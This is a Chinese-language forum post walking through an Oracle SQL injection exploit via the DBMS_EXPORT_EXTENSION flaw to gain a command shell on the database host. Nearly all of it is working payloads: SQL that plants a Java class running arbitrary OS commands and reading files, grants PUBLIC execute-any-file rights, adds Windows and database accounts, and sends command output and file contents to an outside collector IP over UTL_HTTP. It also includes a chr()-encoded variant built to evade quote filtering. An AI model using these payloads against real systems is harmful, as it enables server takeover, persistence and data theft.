实例演示oracle注入获取cmdshell的全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
以下的演示都是在 web 上的 SQL*Plus 中执行的。在 web 注入时，把 select SYS.DBMS_EXPORT_EXTENSION..... 改成
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
的形式即可（用 'a'|| 拼接是为了让整个条件恒为 true：子查询即使返回 NULL，'a'||NULL 仍是 'a'，页面照常返回）。
语句有点长，可能要用 POST 提交。
注意：整个方法依赖 SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES 的 PL/SQL 注入缺陷——该包以定义者（SYS）权限把第三个参数拼进动态 SQL 执行，所以下面创建的对象都归 SYS 所有。Oracle 在 2006 年的 Critical Patch Update 中已经修复，只有未打补丁的旧实例才受影响；打过补丁的库上这些语句会直接报错。
以下是各个步骤:
1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数，在 Oracle 上创建 Java 类 LinxUtil（需要目标库装有 Oracle JVM 组件，否则 create java source 会失败），里面两个静态方法：runCMD 用于执行系统命令（只捕获标准输出，不捕获标准错误），readFile 用于读取文件。它们以 Oracle 服务进程所属的操作系统账号运行，权限通常很高：
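-- Step 1: create the Java helper class inside the database.
-- The whole DDL travels in the third argument of
-- SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES, which concatenates that
-- argument into dynamic SQL and runs it with definer rights (SYS) -- that is
-- why every object created here ends up owned by SYS. Oracle closed this
-- PL/SQL injection in its 2006 Critical Patch Updates; it only works on
-- unpatched, old instances.
-- Quoting: '' is one quote inside the first EXECUTE IMMEDIATE string, '''' is
-- one quote inside the second (the DDL itself). The Java source uses only
-- double quotes, so it needs no further escaping. PRAGMA AUTONOMOUS_TRANSACTION
-- is required because DDL commits and is otherwise rejected inside a function
-- called from a SELECT. The trailing -- comments out whatever the package
-- appends after our input. Later payloads on this page write PUT(:P1), the
-- bind-placeholder form, instead of PUT(1); if one form errors, try the other.
-- Web form: /xxx.jsp?id=1 and '1'<>'a'||( <this select> )
-- Requires the Oracle JVM component to be installed in the target database.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as
import java.io.*;
public class LinxUtil extends Object {
    // runCMD: runs args through Runtime.exec (the JVM splits the string on
    // whitespace) and returns stdout only; stderr is discarded and any
    // exception comes back as text instead of being raised.
    public static String runCMD(String args) {
        try {
            BufferedReader myReader = new BufferedReader(
                new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));
            String stemp, str = "";
            while ((stemp = myReader.readLine()) != null) str += stemp + "\n";
            myReader.close();
            return str;
        } catch (Exception e) {
            return e.toString();
        }
    }
    // readFile: returns the whole file as text, lines re-joined with "\n"
    // (readLine strips the original line terminators).
    public static String readFile(String filename) {
        try {
            BufferedReader myReader = new BufferedReader(new FileReader(filename));
            String stemp, str = "";
            while ((stemp = myReader.readLine()) != null) str += stemp + "\n";
            myReader.close();
            return str;
        } catch (Exception e) {
            return e.toString();
        }
    }
}'''';END;'';END;--','SYS',0,'1',0) from dual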
------------------------
如果 URL 有长度限制，可以把 readFile() 函数块去掉，即：
/xxx.jsp?id=1 and '1'<>'a'||(
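-- Step 1, short variant for length-limited URLs: same injection primitive as
-- above (SYS definer rights via DBMS_EXPORT_EXTENSION, nested '' / '''' quoting,
-- autonomous transaction so DDL is allowed from a SELECT), but the Java class
-- only carries runCMD. Skip every LinxReadFile statement in the later steps
-- when using this form.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as
import java.io.*;
public class LinxUtil extends Object {
    // runCMD: runs args through Runtime.exec and returns stdout only;
    // exceptions are returned as text.
    public static String runCMD(String args) {
        try {
            BufferedReader myReader = new BufferedReader(
                new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));
            String stemp, str = "";
            while ((stemp = myReader.readLine()) != null) str += stemp + "\n";
            myReader.close();
            return str;
        } catch (Exception e) {
            return e.toString();
        }
    }
}'''';END;'';END;--','SYS',0,'1',0) from dual
)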
同时把后面步骤中提到的对 readFile() / LinxReadFile 的处理语句去掉。
------------------------------
2.赋 Java 权限（注意：这是把“执行任意文件”的 FilePermission 授给 PUBLIC，即所有数据库用户；它是持久性的改动，后面的清理步骤不会自动撤销）
-- Step 2: grant PUBLIC (every database user) the Java permission to execute
-- any file on the host. Runs as SYS through the same injection primitive.
-- This is a persistent, server-wide privilege grant: it survives the clean-up
-- step (which only drops a function) and is visible to a defender in
-- DBA_JAVA_POLICY. Eight quotes collapse to one single quote inside the DDL.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
3.创建函数
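-- Step 3a: PL/SQL call specification wrapping LinxUtil.runCMD. Created as SYS
-- (see step 1), so it is invoked later as sys.LinxRunCMD; the unquoted name
-- is stored upper-case (LINXRUNCMD). Eight quotes collapse to one inside the
-- DDL. The OS command runs as the account the Oracle server process runs
-- under -- on Windows frequently a highly privileged service account; confirm
-- on the target.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';'''';END;'';END;--','SYS',0,'1',0) from dual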
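-- Step 3b: PL/SQL call specification wrapping LinxUtil.readFile (omit when the
-- short Java variant without readFile was used). Same quoting and ownership as
-- LinxRunCMD: owned by SYS, stored as LINXREADFILE.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';'''';END;'';END;--','SYS',0,'1',0) from dual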
4.赋 public 执行函数的权限（函数只需要 EXECUTE 权限，grant execute 即可；grant all 范围更大）
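-- Step 4: let every database user call the two SYS-owned wrappers, so the web
-- application account can invoke them. EXECUTE is the only privilege a
-- function needs; "grant all" is wider than necessary. Like step 2 this is a
-- lasting change that the clean-up step does not revoke.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual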
5.测试上面的几步是否成功
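-- Step 5: confirm the two wrappers exist. Use a bare subquery: when the object
-- is missing the subquery yields NULL, '1'<>NULL is UNKNOWN and the page
-- changes. The original first check was written '1'<>'11'||(...), which is
-- true whether or not the object exists (NULL concatenates to '11'), so it
-- could never fail and tested nothing. Names are upper-case because the
-- functions were created unquoted.
and '1'<>(
select OBJECT_ID from all_objects where object_name = 'LINXRUNCMD'
)
and '1'<>(
select OBJECT_ID from all_objects where object_name = 'LINXREADFILE'
)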
6.执行命令：
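-- Step 6: use the SYS-owned wrappers. Both return VARCHAR2, so the comparison
-- must be against a string ('1'<>), not a number. A command that writes
-- nothing to stdout makes runCMD return an empty string, which Oracle treats
-- as NULL: the condition becomes UNKNOWN and the page looks like a failure
-- even though the command ran. Commands execute as the OS account of the
-- Oracle server process. "net user linx /add" creates a local Windows
-- account -- noisy and persistent; prefer a command whose side effect you can
-- read back and remove.
/xxx.jsp?id=1 and '1'<>(
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
/xxx.jsp?id=1 and '1'<>(
select sys.LinxReadFile('c:/boot.ini') from dual
)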
注意 sys.LinxRunCMD() / sys.LinxReadFile() 返回的是 varchar2 类型，不能用 "and 1<>" 代替 "and '1'<>"。另外，命令没有任何标准输出时函数返回空串，Oracle 把空串当 NULL，条件结果为 UNKNOWN，页面看起来像“失败”——但命令其实已经执行了。
如果要直接看运行结果可以用 union（要求列数和列类型与原查询一致）：
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者用 UTL_HTTP.request 带外回传（数据库主机要能出站访问 HTTP；11g 起还需要给该用户配置网络 ACL，否则报 ORA-24247）：
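-- Out-of-band retrieval: push the result to an HTTP listener you control.
-- 211.71.147.3 is the original author's collector -- replace it. The database
-- host must be allowed to reach it, and on 11g and later the calling user
-- also needs a network ACL for UTL_HTTP (DBMS_NETWORK_ACL_ADMIN) or the call
-- fails with ORA-24247.
-- Bug in the original: REPLACE(x, '\n', '%0A') searches for the two characters
-- backslash and n -- Oracle does not interpret escapes in string literals --
-- while the Java helper appends a real line feed, so the request broke at the
-- first newline. Match chr(10) instead (readLine already stripped any CR).
-- The second request is also tagged LinxReadFile rather than LinxRunCMD.
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),chr(10),'%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxReadFile:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),chr(10),'%0A')) FROM dual
)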
' Q1 p9 y0 U& L; p0 S5 p2 W/ C注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。2 x+ N. h8 X  t- _
--------------------
7.内部变化
通过以下命令可以查看 all_objects 的改变（这些同时也是留给防守方的取证线索）：
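-- Step 7: what the steps above left behind (also the artefacts a defender
-- should hunt for). Both patterns are needed: the functions were created
-- unquoted and are stored as LINXRUNCMD / LINXREADFILE, while the Java source
-- was created as "LinxUtil" in double quotes and keeps its case. All of them
-- are owned by SYS. The FilePermission from step 2 is not an object and is
-- listed in DBA_JAVA_POLICY instead.
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'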
8.删除我们创建的对象（原文只删了 LinxRunCMD；LinxReadFile、Java 源码 "LinxUtil" 和第 2 步授给 PUBLIC 的 FilePermission 都还留在库里）
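-- Step 8: clean up. The original dropped only LinxRunCMD and left the rest of
-- the footprint in place: LinxReadFile, the SYS-owned Java source "LinxUtil"
-- (created in double quotes, so it keeps its mixed case), and the PUBLIC
-- <<ALL FILES>> execute permission from step 2. Each statement goes through
-- the same injection primitive, one request per statement. Dropping the Java
-- source should also remove the class compiled from it -- verify with the
-- all_objects query in step 7. None of this removes audit or alert-log
-- records.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxReadFile'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop java source "LinxUtil"'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.revoke_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual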
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法：
创建 Oracle 帐号（比创建 Java 对象更直接，但 CREATE USER 通常会被审计记录，密码 linxsql 也很弱；测完记得删掉）：
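-- Alternative proof of the primitive: create a database account as SYS via
-- the same DBMS_EXPORT_EXTENSION injection. Loud (CREATE USER is commonly
-- audited) and the password is trivial; the account is dropped again below.
-- The unquoted name is stored upper-case, hence 'LINXSQL' in the check.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual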
即（等价的 chr() 拼接形式，注入点过滤单引号时用这种写法；注意这里用的是 PUT(:P1)，且因为字符串是直接拼出来的，引号层级比上面少一层）：
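-- Quote-free variant of the CREATE USER payload, built with chr() so the
-- request contains no single quotes. It decodes to:
--   'FOO', 'BAR',
--   DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''CREATE USER linxsql IDENTIFIED BY linxsql'';END;';END;--
--   'SYS', 0, '1', 0
-- Because the string is assembled rather than written as a literal, each
-- quote level is one level shallower than in the literal payloads above, and
-- this form uses the PUT(:P1) bind-placeholder spelling.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual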
确定漏洞存在（帐号建成则说明注入以 SYS 权限执行成功）：
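-- Confirm the account exists. user_id is numeric, so a numeric comparison is
-- fine here (unlike the VARCHAR2 wrappers above). If LINXSQL is absent the
-- subquery is NULL, the condition is UNKNOWN and the page changes.
1<>(
select user_id from all_users where username = 'LINXSQL'
)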
给 linxsql 连接权限（CONNECT 角色，之后就能直接用它登录数据库）：
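-- Give the test account login rights (CONNECT role) so it can be used for a
-- direct database session. Same SYS-rights primitive; drop the account again
-- when done.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual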
删除帐号：
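-- Drop the test account. This payload uses PUT(:P1), the bind-placeholder
-- form, where the earlier ones used PUT(1); both spellings appear on this
-- page -- if one errors on a given target, try the other.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual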
======================
以下方法创建一个可以执行任意语句的函数 Linx_query()，执行成功（execute immediate 没有抛异常）的话返回数值 1。但它声明为 authid current_user（调用者权限），所以传进去的语句是以调用者——也就是 web 应用连接数据库的那个账号——的权限执行的，虽然函数归 SYS 所有，本身并不提权，可能只有 public 级别的权限，作用不大。真的要用的话可以先通过上面的 SYS.DBMS_EXPORT_EXTENSION 原语 grant dba 给当前用户（当前用户可用 select user from dual 查到），不过这种改动更明显、更容易被审计发现：
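-- Optional: a generic "run any statement" wrapper. It is AUTHID CURRENT_USER
-- (invoker rights), so although SYS owns it, the statement passed in runs
-- with the privileges of whoever calls it -- the web application account --
-- and it returns 1 only if EXECUTE IMMEDIATE did not raise. It therefore adds
-- no privilege beyond what that account already has; the DBMS_EXPORT_EXTENSION
-- primitive above (which does run as SYS) is what actually escalates.
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end;'''';END;'';END;--','SYS',0,'1',0) from dual
)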